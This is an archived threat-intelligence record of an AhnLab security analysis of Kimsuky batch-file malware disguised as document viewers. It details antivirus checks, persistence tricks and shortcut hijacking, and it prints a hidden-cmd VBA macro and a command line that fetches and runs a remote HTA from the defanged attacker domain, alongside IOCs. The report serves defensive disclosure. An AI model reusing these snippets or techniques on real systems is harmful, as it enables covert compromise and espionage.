{ "id": "01b9ed36-efcf-4d8d-90aa-b1786352567c", "created_at": "2026-04-06T00:07:22.49089Z", "updated_at": "2026-04-10T13:12:34.042053Z", "deleted_at": null, "sha1_hash": "b75e71acd40f14db201d8f0b5e69b976bd6bd15b", "title": "Malicious Batch File (*.bat) Disguised as a Document Viewer Being Distributed (Kimsuky)", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1899960, "plain_text": "Malicious Batch File (*.bat) Disguised as a Document Viewer Being\r\nDistributed (Kimsuky)\r\nBy ATCP\r\nPublished: 2023-06-28 · Archived: 2026-04-05 22:30:29 UTC\r\nAhnLab Security Emergency response Center (ASEC) has confirmed the distribution of malware in the form of a batch file\r\n(*.bat). This malware is designed to download various scripts based on the anti-malware process, including AhnLab\r\nproducts, installed in the user’s environment. Based on the function names used by the malware and the downloaded URL\r\nparameters, it is suspected to have been distributed by the Kimsuky group.\r\nAlthough the exact distribution path of the malware has not been confirmed, it appears that it is being distributed via email.\r\nAs shown below, the identified batch files have been disguised to appear as viewers for document programs such as Word\r\nand HWP.\r\nDate of Identification Filename\r\nMar. 22 docview.bat\r\nMar. 28 pdfview.bat\r\nJun. 12 hwp.bat\r\nJun. 20 docxview.bat\r\nJun. 21 pdf.bat\r\nTable 1. Files that have been identified.\r\nWhen the batch file is executed, it accesses Google Drive and Docs through the “explorer” command. Through this process,\r\nit executes a document file uploaded to Google Docs or Drive, making it appear as if a viewer program was executed. The\r\nexecuted documents mostly contain content related to the military or unification.\r\nDocument Title Accessed URL\r\nMilitary Security\r\nReview of the U.S. Indo-Pacific Strategy –\r\nFocusing on the U.S.\r\nIndo-Pacific\r\nCommand.pdf\r\nhxxps://drive.google.com/file/d/1e41uC2ZTYvTc3CvS6wIKox22AGdP4nFB/view?usp=sharing\r\nConsent\r\nForm_Princeton\r\nStudy.pdf\r\nhxxps://drive.google.com/file/d/1tI4J95-7HDGES8e6oHR-wu0cXD8wHPUc/view?usp=sharing\r\nBuilding a Prosperous\r\nHomeland through the\r\nPrinciple of Liberal\r\nDemocracy: Achieving\r\nReunification of the\r\nKorean Peninsula.pdf\r\nhxxps://docs.google.com/document/d/1NJfvSpdku2PW3gwg0dnoELrlVp3CEGB4mtNIFE4bO\r\nusp=sharing\r\nNK_nuclear_threat.docx\r\nhxxps://docs.google.com/document/d/1C3h0agp3E6Z4a9z-YxnMTgP3Fd9y8n2C/edit?\r\nrtpof=true\u0026sd=true\r\nhttps://asec.ahnlab.com/en/55219/\r\nPage 1 of 6\n\nKorea-U.S. Alliance\r\n(Global Defense)-\r\nnew.hwp\r\nhxxps://drive.google.com/file/d/1rCws6IDhJvynpM3TOSv3IKGWNKXI5uH9/view?usp=sharin\r\nTable 2. Identified document titles and URL addresses\r\nAfterward, it utilizes the “wmic” command to identify various anti-malware processes. The threat actor downloads different\r\nscripts based on the type of anti-malware process that is running in the user’s environment.\r\nChecked AV\r\nProducts\r\n(Process\r\nName)\r\nDownload Path and Filename Download URL\r\nKaspersky\r\n(avpui.exe,\r\navp.exe )\r\n%appdata%\\Microsoft\\Templates\\Normal.dotm\r\nhxxp://joongang[.]site/pprb/sec/ca.php?\r\nna=dot_kasp.gif\r\nc:\\users\\public\\videos\\video.vbs\r\nhxxp://joongang[.]site/pprb/sec/ca.php?\r\nna=reg0.gif\r\nAvast\r\n(\r\navastui.exe,\r\navgui.exe )\r\n%appdata%\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\onenote.vbs\r\nhxxp://joongang[.]site/pprb/sec/ca.php?\r\nna=sh_ava.gif\r\nAhnlab\r\n( v3 )\r\n%appdata%\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\onenote.vbs\r\nhxxps://joongang[.]site/pprb/sec/ca.php?\r\nna=sh_vb.gif\r\n%appdata%\\asdfg.vbs\r\nhxxps://joongang[.]site/pprb/sec/ca.php?\r\nna=vbs.gif\r\nALYac\r\n(ayagent.aye\r\n)\r\n%appdata%\\asdfg.vbs\r\nhxxps://joongang[.]site/pprb/sec/ca.php?\r\nna=vbs.gif If there are\r\nno matching\r\nproducts\r\nhttps://asec.ahnlab.com/en/55219/\r\nPage 2 of 6\n\nTable 2. Downloaded file for each identified AV process\r\nWhen a Kaspersky (avpui.exe, avp.exe) process is identified\r\nTo replace the default document template, Normal.dotm, the threat actor terminates the Word process and downloads a dotm\r\nfile from hxxp://joongang[.]site/pprb/sec/ca.php?na=dot_kasp.gif. They then replace Normal.dotm with the downloaded file.\r\nThe downloaded Normal.dotm file has an embedded VBA code that executes cmd.exe in a hidden window, as shown below.\r\nCurrently, it simply executes cmd.exe, but various commands could be executed depending on the threat actor’s intentions.\r\nSub autoopen()\r\n On Error Resume Next\r\n a = Shell(\"cmd.exe\", 0)\r\nEnd Sub\r\nAfterward, it downloads “video.vbs” from hxxp://joongang[.]site/pprb/sec/ca.php?na=reg0.gif and registers it to the\r\nfollowing registry to ensure continuous execution.\r\nRegistry: HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\r\nName: AutoRun\r\nValue: wscript.exe c:\\users\\public\\videos\\video.vbs\r\nWhen the “video.vbs” file is executed, it checks if a file named “qwer.gif” exists in the %appdata%\\Microsoft folder. If the\r\nfile exists, it renames it to “qwer.bat” and then executes it. If “qwer.gif” does not exist, it downloads and executes the file\r\nfrom hxxp://joongang[.]site/pprb/sec/d.php?na=battmp.\r\nThe command identified from the above URL at the time of analysis is as follows.\r\nWhen an Avast (avastui.exe, avgui.exe) process is identified\r\nThe threat actor downloads an additional script from hxxp://joongang[.]site/pprb/sec/ca.php?na=sh_ava.gif and saves it in\r\nthe startup programs folder under the name onenote.vbs to ensure it runs continuously.\r\nWhen the “onenote.vbs” file is executed, it utilizes WMI to collect the Description of Win32_Battery and Win32_Process. It\r\nalso performs the downloading and run key registration of the previously mentioned “video.vbs” file.\r\nAdditionally, it modifies the location or properties of browser and email-related shortcuts (*.lnk files) that exist in a specific\r\nfolder. This modification is done in such a way that when the user clicks on the shortcut file to launch Outlook or a browser,\r\nthe threat actor’s malicious command is executed as well.\r\nTo achieve this, the threat actor moves the browser and email-related shortcut files from C:\\Users\\Public\\Desktop to\r\nC:\\Users\\[username]\\Desktop\\[filename]. They then modify the arguments in the properties of the shortcut files that exist in\r\nhttps://asec.ahnlab.com/en/55219/\r\nPage 3 of 6\n\nthe folders mentioned in the table below.\r\nFolder Name\r\nLNK’s Target\r\nFile Name\r\nChanged LNK Arguments\r\nC:\\Users\\Public\\Desktop\r\n(Moved to C:\\Users\\[username]\\Desktop\r\nand properties changed)\r\nmsedge.exe\r\nchrome.exe\r\noutlook.exe\r\nwhale.exe\r\nfirefox.exe\r\ncmd.exe /c start [filename]\r\n[previous arguments] [command\r\nconfigured by the threat actor]\r\nC:\\Users\\[username]\\Desktop\r\n%appdata%\\Microsoft\\Internet\r\nExplorer\\Quick Launch”\r\nTable 3. Folder paths and target filenames of the LNK files to be modified\r\nAt the time of analysis, the onenote.vbs file downloaded upon the confirmation of an Avast process did not contain the\r\n[command set by the threat actor]. However, various malicious commands can still be executed according to the threat\r\nactor’s intentions.\r\nAfterward, the previously collected information is transmitted to hxxps://joongang[.]site/pprb/sec/r.php. The transmitted data\r\nis as follows.\r\n[Battery Information] [Process Information] ENTER bin short ok\r\nFormat of transmitted data\r\nWhen an Ahnlab (v3) process is identified\r\nThis procedure is similar to when an Avast process is identified. An additional script file is downloaded from\r\nhxxps://joongang[.]site/pprb/sec/ca.php?na=sh_vb.gif and saved in the startup programs folder under the name onenote.vbs.\r\nThe aforementioned script file performs the same functionality as the previously described onenote.vbs (?na=sh_ava.gif).\r\nHowever, the downloaded onenote.vbs file from hxxps://joongang[.]site/pprb/sec/ca.php?na=sh_vb.gif contains the\r\n[command set by the threat actor] that is included in the arguments used upon changing the properties of shortcut files.\r\n\u0026 echo Set ws = CreateObject(\"\"WScript.Shell\"\"):\r\na=ws.run(\"\"mshta.exe hxxps://joongang[.]site/pprb/sec/t1.hta\"\",0,false) \u003e \"\"%appdata%\\1.vbs\"\"\r\n\u0026 start wscript.exe /b \"\"%appdata%\\1.vbs\r\nhttps://asec.ahnlab.com/en/55219/\r\nPage 4 of 6\n\nTherefore, every time a user executes the shortcut file for a browser or Outlook, the script located at\r\nhxxps://joongang[.]site/pprb/sec/t1.hta is saved and executed as %appdata%\\1.vbs. At the time of analysis, the URL\r\ncontained the following command to close the window:\r\nOn Error Resume Next\r\nwindow.close()\r\nAfterward, aside from when Kaspersky (avpui.exe, avp.exe) and Avast (avastui.exe, avgui.exe) processes are identified,\r\nadditional scripts are downloaded from hxxps://joongang[.]site/pprb/sec/ca.php?na=vbs.gif and saved as asdfg.vbs in the\r\n%appdata% folder.\r\nThe downloaded asdfg.vbs file is registered in the task scheduler as CleanupTemporaryState and scheduled to run every 41\r\nminutes.\r\nLike the video.vbs file, the asdfg.vbs file downloads and executes additional scripts from\r\nhxxps://joongang[.]site/pprb/sec/d.php?na=battmp.\r\nAt the time of analysis, behaviors such as downloading executable files were not present. However, due to the nature of\r\ndownloading and executing various scripts, there is a possibility of additional unidentified malicious activities being carried\r\nout based on the commands present in the scripts. Furthermore, the threat actor replaced the default document template,\r\nNormal.dotm, and modified browser and email-related shortcut files.  Therefore, since there is a possibility of malicious\r\nscripts being installed upon the execution of shortcut files (*.lnk) of Word documents, Internet browsers like Chrome, and\r\nOutlook, extra caution is advised.\r\n[File Detection]\r\nDownloader/BAT.Generic.S2300 (2023.06.26.03)\r\nTrojan/VBS.Agent.SC190255 (2023.06.30.00)\r\nTrojan/VBS.Agent.SC190256 (2023.06.30.00)\r\nDownloader/VBS.Agent.SC190254 (2023.06.30.00)\r\n[Behavior Detection]\r\nExecution/MDP.Curl.M4675\r\nExecution/MDP.Curl.M11183\r\nExecution/EDR.Curl.M11182\r\n[References]\r\nhttps://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/\r\nMD5\r\n00119ed01689e76cb7f33646693ecd6a\r\nhttps://asec.ahnlab.com/en/55219/\r\nPage 5 of 6\n\n7d79901b01075e29d8505e72d225ff52\r\n8536d838dcdd026c57187ec2c3aec0f6\r\na7ac7d100184078c2aa5645552794c19\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//joongang[.]site/doc/\r\nhttp[:]//joongang[.]site/docx/\r\nhttp[:]//joongang[.]site/pprb/sec/\r\nhttp[:]//namsouth[.]com/gopprb/OpOpO/\r\nhttp[:]//staradvertiser[.]store/signal/\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner\r\nbelow.\r\nSource: https://asec.ahnlab.com/en/55219/\r\nhttps://asec.ahnlab.com/en/55219/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://asec.ahnlab.com/en/55219/" ], "report_names": [ "55219" ], "threat_actors": [ { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434042, "ts_updated_at": 1775826754, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b75e71acd40f14db201d8f0b5e69b976bd6bd15b.pdf", "text": "https://archive.orkl.eu/b75e71acd40f14db201d8f0b5e69b976bd6bd15b.txt", "img": "https://archive.orkl.eu/b75e71acd40f14db201d8f0b5e69b976bd6bd15b.jpg" } }